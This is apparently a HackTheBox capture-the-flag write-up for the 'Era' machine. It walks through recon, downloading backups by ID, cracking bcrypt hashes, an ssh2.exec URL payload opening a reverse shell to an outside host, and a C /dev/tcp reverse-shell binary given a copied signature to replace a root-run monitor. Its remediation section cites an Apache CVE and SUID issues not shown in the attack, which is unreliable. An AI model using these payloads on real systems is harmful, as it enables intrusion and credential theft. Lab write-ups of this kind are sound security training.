HTB: Era Machine Writeup

HackTheBox

Linux

Web

LFI

Privilege Escalation

HackTheBox Era makinesi detaylı çözümü

Author

biyik

Published

October 19, 2025

HTB Era Machine Writeup

Era machine on the HackTheBox platform.

Reconnaissance

This section details the reconnaissance activities performed on the target system.

Host Resolution

curl -v http://10.10.11.79
Trying 10.10.11.79:80...
< Location: http :// era.htb/

Nmap scan top ports 1000

nmap -A -sC -sV era.htb -oN nmap.txt -vvv
Not shown: 998 closed tcp ports (reset)
4 PORT STATE SERVICE REASON VERSION
5 21/tcp open ftp syn -ack ttl 63 vsftpd 3.0.5
6 80/tcp open http syn -ack ttl 63 nginx 1.18.0 (Ubuntu)
7 | http -methods:
8 |_ Supported Methods: GET HEAD
9 |_http -title: Era Designs
10 |_http -favicon: Unknown favicon MD5: 0309
B7B14DF62A797B431119ADB37B14
11 Device type: general purpose
12 Running: Linux 5.X
13 OS CPE: cpe:/o:linux:linux_kernel :5
14 OS details: Linux 5.0 - 5.14
15 TCP/IP fingerprint:

result:

Port 21/tcp: vsftpd 3.0.5
Port 80/tcp: nginx 1.18.0 (Ubuntu)
OS: Linux 5.0 - 5.14

directory fuzzing with ffuf

fuff -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000. txt -u http :// era.htb/ -H "Host: FUZZ.era.htb" -mc 200
***
file [Status: 200, Size: 6765, Words: 2608,Lines: 234, Duration: 61ms]
 ***

result subdomain: file.era.htb

ffuf with php session cookie

ffuf -u 'http://file.era.htb/download.php?id=FUZZ' -w <(seq 0 10000) -H 'Cookie: PHPSESSID=vofmm****2vc' -mc 200 -fs 7686
***
54                      [Status: 200, Size: 6378, Words: 2552, Lines: 222, Duration: 79ms]
150                     [Status: 200, Size: 6366, Words: 2552, Lines: 222, Duration: 57ms]
4151                    [Status: 200, Size: 6370, Words: 2552, Lines: 222, Duration: 54ms]
***

Result IDs: 54, 150, 4151 ffuf fs size results 7686 bytes because 7686 equals many 200 OK response many files. limited to 7686 bytes results for further analysis.

result for recon

Host resolved to IP: 10.10.11.79
Open ports: 21 (FTP), 80 (HTTP)
Services: nginx 1.18.0 (Ubuntu), vsftpd 3.0.5
Operating System: Linux 5.0 - 5.14
Directories for era.htb: /images, /css, /js, /register
Subdomain found: file.era.htb
Directories for file.era.htb: /register, /login

Weaponization

preparation of the exploit.

Vulnerability Identification

we found 54 and 150 and 4151 files with 200 OK response from ffuf results. After analyzing the files, we identified a Local File Inclusion (LFI) vulnerability in the web application hosted on era.htb. The vulnerability allows an attacker to read sensitive files from the server. 150 id file content: signing.zip

Zip and pem file analysis

curl -L http://file.era.htb/download.php?id=150 -H "Cookie: PHPSESSID=vofmm****2vc" | grep signin
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  6366    0  6366    0     0  25469      0 --:--:-- --:--:-- --:--:-- 25566
        <p>signing.zip</p>

curl -X GET "http://file.era.htb/download.php?id=150&dl=true" -H "Cookie: PHPSESSID=vofmm****2vc" --output signin.zip
***
    unzip signin.zip
    inflating: key.pem                 
  inflating: x509.genkey 
***
curl -X GET "http://file.era.htb/download.php?id=54&dl=true" -H "Cookie: PHPSESSID=vofmmgcsqftm6t8cftodhn52vc" --output sitebackup.zip

search any important anything in the files

unzip sitebackup.zip 
   ***
   filedb.sqlite
   ***
   sqlite3 filedb.sqlite "SELECT user_name || ':' || user_password FROM users;" > hashes.txt
    cat hashes.txt
    admin_ef01cab31aa:$2y$10$wDbohsUaez********1If6WrYr.QPC
    eric:$2y$10$S9EOSDqF1RzNUvyV***********.D.ABQLhSV2Qvxm
    veronica:$2y$10$xQmS7JL8UT4B3jAY***************GCxLveQ805kuQGOK
    yuri:$2b$12$HkRKUdjjOdf2WuTXovkH*************jRqUWqwEL2.
    john:$2a$10$iccCEz6.5.W2p7CSBOr3*************a1T1V/IddE6
    ethan:$2a$10$PkV/LAd07ftxVzBHhr****************puUV/dh/a1wC
    ***
    hashcat -m 3200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt.gz -w 3 -O --username
    ***
    $2y$10$S9EOSDqF1RzNUvyVj7Ot*************.ABQLhSV2Qvxm:ame****
    $2b$12$HkRKUdjjOdf2WuTXovkHIOX************uWejRqUWqwEL2.:mu*****
    ***

cracked this hash for users:

eric:ame****
yuri:mu*****

Exploitation

Initial Access - SSH Wrapper

# Reverse shell payload
http://file.era.htb/download.php?id=150&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.50%2F9001%200%3E%261;true%27

# Listener
nc -lvnp 9001

✅ The shell is in my hand

Privilege Escalation

This section outlines the steps taken to escalate privileges on the target system. ### AV bypass and reverse shell root

Custom binary :

#include <stdio.h>
int main() {
    system("/bin/bash -c 'bash -i >& /dev/tcp/TUN0IP/4242 0>&1'"); 
    return 0;
}

gcc exploit.c -o monitor2
python3 -m http.server 8000

On the Target System

wget -L http://TUN0IP:8000/monitor2
    ric@era:/tmp$ objcopy --dump-section .text_sig=sig /opt/AV/periodic-checks/monitor
    <ction .text_sig=sig /opt/AV/periodic-checks/monitor
    eric@era:/tmp$ ls -la sig
    ls -la sig
    -rw-rw-r-- 1 eric eric 458 Oct 18 21:10 sig
    eric@era:/tmp$ objcopy --add-section .text_sig=sig /opt/AV/periodic-checks/monitor2
    <tion .text_sig=sig /opt/AV/periodic-checks/monitor2
    eric@era:/tmp$ cd /opt/AV^[OM
    cd /opt/AV
    eric@era:/opt/AV$ cd peri
    cd periodic-checks/
    eric@era:/opt/AV/periodic-checks$ cp monitor2 monitor
    cp monitor2 monitor
    eric@era:/opt/AV/periodic-checks$

Get Root Shell

nc -lvnp 4242

 nc -lvnp 4242
    listening on [any] 4242 ...

    connect to [TUN0IP] from (UNKNOWN) [ERA.HTB] 49138
    bash: cannot set terminal process group (4658): Inappropriate ioctl for device
    bash: no job control in this shell
    root@era:~# 
    root@era:~# ls
    ls
    answers.sh
    clean_monitor.sh
    initiate_monitoring.sh
    monitor
    root.txt
    root@era:~# cat root.txt
    cat root.txt
    205***************d3e12f17b7b950
    root@era:~#

🎉 Root elde edildi!

Remediation

Öneriler

CVE-2021-41773:

Update Apache to version 2.4.53 or later.
Implement proper access controls in the Apache configuration.

Weak Passwords:
- Strong password policy
- MFA (Multi-Factor Authentication)
- Password complexity requirements
AV Bypass:
- Binary imzalama mekanizması güçlendirme
- Dosya bütünlük kontrolü
- Sudoers konfigürasyonu gözden geçirme
SUID Vulnerability

Remove unnecessary SUID permissions

chmod -s /usr/bin/suid_binary

--- title: "HTB: Era Machine Writeup" description: "HackTheBox Era makinesi detaylı çözümü" author: "biyik" date: "2025-10-19" categories: [HackTheBox, Linux, Web, LFI, Privilege Escalation] format: html: code-fold: false code-tools: true toc: true toc-depth: 3 --- # HTB Era Machine Writeup Era machine on the HackTheBox platform. --- ## Reconnaissance This section details the reconnaissance activities performed on the target system. ### Host Resolution ```bash curl -v http://10.10.11.79 Trying 10.10.11.79:80... < Location: http :// era.htb/ ``` ### Nmap scan top ports 1000 ```bash nmap -A -sC -sV era.htb -oN nmap.txt -vvv Not shown: 998 closed tcp ports (reset) 4 PORT STATE SERVICE REASON VERSION 5 21/tcp open ftp syn -ack ttl 63 vsftpd 3.0.5 6 80/tcp open http syn -ack ttl 63 nginx 1.18.0 (Ubuntu) 7 | http -methods: 8 |_ Supported Methods: GET HEAD 9 |_http -title: Era Designs 10 |_http -favicon: Unknown favicon MD5: 0309 B7B14DF62A797B431119ADB37B14 11 Device type: general purpose 12 Running: Linux 5.X 13 OS CPE: cpe:/o:linux:linux_kernel :5 14 OS details: Linux 5.0 - 5.14 15 TCP/IP fingerprint: ``` **result:** - **Port 21/tcp:** vsftpd 3.0.5 - **Port 80/tcp:** nginx 1.18.0 (Ubuntu) - **OS:** Linux 5.0 - 5.14 ### directory fuzzing with ffuf ```bash fuff -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000. txt -u http :// era.htb/ -H "Host: FUZZ.era.htb" -mc 200 *** file [Status: 200, Size: 6765, Words: 2608,Lines: 234, Duration: 61ms] *** ``` **result subdomain:** `file.era.htb` ### ffuf with php session cookie ```bash ffuf -u 'http://file.era.htb/download.php?id=FUZZ' -w <(seq 0 10000) -H 'Cookie: PHPSESSID=vofmm****2vc' -mc 200 -fs 7686 *** 54 [Status: 200, Size: 6378, Words: 2552, Lines: 222, Duration: 79ms] 150 [Status: 200, Size: 6366, Words: 2552, Lines: 222, Duration: 57ms] 4151 [Status: 200, Size: 6370, Words: 2552, Lines: 222, Duration: 54ms] *** ``` **Result IDs:** 54, 150, 4151 ffuf fs size results 7686 bytes because 7686 equals many 200 OK response many files. limited to 7686 bytes results for further analysis. ### result for recon - Host resolved to IP: 10.10.11.79 - Open ports: 21 (FTP), 80 (HTTP) - Services: nginx 1.18.0 (Ubuntu), vsftpd 3.0.5 - Operating System: Linux 5.0 - 5.14 - Directories for era.htb: /images, /css, /js, /register - Subdomain found: file.era.htb - Directories for file.era.htb: /register, /login --- ## Weaponization preparation of the exploit. ### Vulnerability Identification we found 54 and 150 and 4151 files with 200 OK response from ffuf results. After analyzing the files, we identified a Local File Inclusion (LFI) vulnerability in the web application hosted on era.htb. The vulnerability allows an attacker to read sensitive files from the server. 150 id file content: signing.zip ### Zip and pem file analysis ```bash curl -L http://file.era.htb/download.php?id=150 -H "Cookie: PHPSESSID=vofmm****2vc" | grep signin % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 6366 0 6366 0 0 25469 0 --:--:-- --:--:-- --:--:-- 25566 <p>signing.zip</p> curl -X GET "http://file.era.htb/download.php?id=150&dl=true" -H "Cookie: PHPSESSID=vofmm****2vc" --output signin.zip *** unzip signin.zip inflating: key.pem inflating: x509.genkey *** curl -X GET "http://file.era.htb/download.php?id=54&dl=true" -H "Cookie: PHPSESSID=vofmmgcsqftm6t8cftodhn52vc" --output sitebackup.zip ``` ### search any important anything in the files ```bash unzip sitebackup.zip *** filedb.sqlite *** sqlite3 filedb.sqlite "SELECT user_name || ':' || user_password FROM users;" > hashes.txt cat hashes.txt admin_ef01cab31aa:$2y$10$wDbohsUaez********1If6WrYr.QPC eric:$2y$10$S9EOSDqF1RzNUvyV***********.D.ABQLhSV2Qvxm veronica:$2y$10$xQmS7JL8UT4B3jAY***************GCxLveQ805kuQGOK yuri:$2b$12$HkRKUdjjOdf2WuTXovkH*************jRqUWqwEL2. john:$2a$10$iccCEz6.5.W2p7CSBOr3*************a1T1V/IddE6 ethan:$2a$10$PkV/LAd07ftxVzBHhr****************puUV/dh/a1wC *** hashcat -m 3200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt.gz -w 3 -O --username *** $2y$10$S9EOSDqF1RzNUvyVj7Ot*************.ABQLhSV2Qvxm:ame**** $2b$12$HkRKUdjjOdf2WuTXovkHIOX************uWejRqUWqwEL2.:mu***** *** ``` **cracked this hash for users:** - `eric:ame****` - `yuri:mu*****` --- ## Exploitation ### Initial Access - SSH Wrapper ```bash # Reverse shell payload http://file.era.htb/download.php?id=150&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.50%2F9001%200%3E%261;true%27 ``` ```bash # Listener nc -lvnp 9001 ``` ✅ **The shell is in my hand** --- ## Privilege Escalation This section outlines the steps taken to escalate privileges on the target system. ### AV bypass and reverse shell root Custom binary : ```c #include <stdio.h> int main() { system("/bin/bash -c 'bash -i >& /dev/tcp/TUN0IP/4242 0>&1'"); return 0; } ``` ```bash gcc exploit.c -o monitor2 python3 -m http.server 8000 ``` ### On the Target System ```bash wget -L http://TUN0IP:8000/monitor2 ric@era:/tmp$ objcopy --dump-section .text_sig=sig /opt/AV/periodic-checks/monitor <ction .text_sig=sig /opt/AV/periodic-checks/monitor eric@era:/tmp$ ls -la sig ls -la sig -rw-rw-r-- 1 eric eric 458 Oct 18 21:10 sig eric@era:/tmp$ objcopy --add-section .text_sig=sig /opt/AV/periodic-checks/monitor2 <tion .text_sig=sig /opt/AV/periodic-checks/monitor2 eric@era:/tmp$ cd /opt/AV^[OM cd /opt/AV eric@era:/opt/AV$ cd peri cd periodic-checks/ eric@era:/opt/AV/periodic-checks$ cp monitor2 monitor cp monitor2 monitor eric@era:/opt/AV/periodic-checks$ ``` ### Get Root Shell ```bash nc -lvnp 4242 ``` ```bash nc -lvnp 4242 listening on [any] 4242 ... connect to [TUN0IP] from (UNKNOWN) [ERA.HTB] 49138 bash: cannot set terminal process group (4658): Inappropriate ioctl for device bash: no job control in this shell root@era:~# root@era:~# ls ls answers.sh clean_monitor.sh initiate_monitoring.sh monitor root.txt root@era:~# cat root.txt cat root.txt 205***************d3e12f17b7b950 root@era:~# ``` 🎉 **Root elde edildi!** --- ## Remediation ### Öneriler 1. **CVE-2021-41773:** - Update Apache to version 2.4.53 or later. - Implement proper access controls in the Apache configuration. 2. **Weak Passwords:** - Strong password policy - MFA (Multi-Factor Authentication) - Password complexity requirements 3. **AV Bypass:** - Binary imzalama mekanizması güçlendirme - Dosya bütünlük kontrolü - Sudoers konfigürasyonu gözden geçirme 4. **SUID Vulnerability** - Remove unnecessary SUID permissions ```bash chmod -s /usr/bin/suid_binary ``` ---